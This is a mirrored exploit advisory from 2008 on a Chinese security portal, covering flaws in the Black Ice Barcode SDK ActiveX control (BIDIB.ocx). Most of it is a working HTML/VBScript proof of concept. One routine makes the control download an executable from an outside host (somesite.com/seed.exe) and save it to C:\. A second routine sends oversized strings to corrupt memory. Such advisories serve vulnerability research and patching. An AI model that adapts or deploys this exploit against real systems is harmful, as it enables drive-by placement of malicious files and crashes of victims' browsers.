首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Black Ice Software Inc Barcode SDK (BIDIB.ocx) Multiple Vulns
来源:http://shinnai.altervista.org 作者:shinnai 发布时间:2008-06-06  
-----------------------------------------------------------------------------
Black Ice Software Inc Barcode SDK (BIDIB.ocx) Arbitrary File Download
and Memory Corruption
url: http://www.blackice.com

File : BIDIB.ocx
Ver. : 10.9.3.0
CLSID: {D2797899-BE27-4CDB-892F-4FDC26EA9BA9}

Mark.: RegKey Safe for Script: True
        RegKey Safe for Init: True
        Implements IObjectSafety: False

Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.

Windows XP Professional SP3 fully patched, with Internet Explorer 7
Windows 2k Professional SP3 fully patched, with Internet Explorer 6

In memory of rgod
-----------------------------------------------------------------------------
<object classid='clsid:D2797899-BE27-4CDB-892F-4FDC26EA9BA9' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the arbitrary file download test'>

<input language=VBScript onclick=MemoryCorruption() type=button value='Click here to start the memory corruption test'>

<script language='vbscript'>
Sub tryMe
  test.DownloadImageFileURL "http://somesite.com/seed.exe", "C:\seed.exe"
End Sub
</script>

<script language='vbscript'>
Sub MemoryCorruption
  buff_0 = String(2068, "A")
 
  buff_1 = String(2068, "B")
 
  test.DownloadImageFileURL buff_0, buff_1
End Sub 
</script>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Asterisk (SIP channel driver /
·Galatolo Web Manager <= 1.0 Re
·Black Ice Software Inc Barcode
·iJoomla News Portal (Itemid) R
·Black Ice Software Inc Barcode
·Flux CMS <= 1.5.0 (loadsave.ph
·Akamai Download Manager < 2.2.
·Telephone Directory 2008 Arbit
·Joomla Component EasyBook 1.1
·Achievo <= 1.3.2 (fckeditor) A
·HP StorageWorks NSI Double Tak
·Black Ice Software Annotation
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved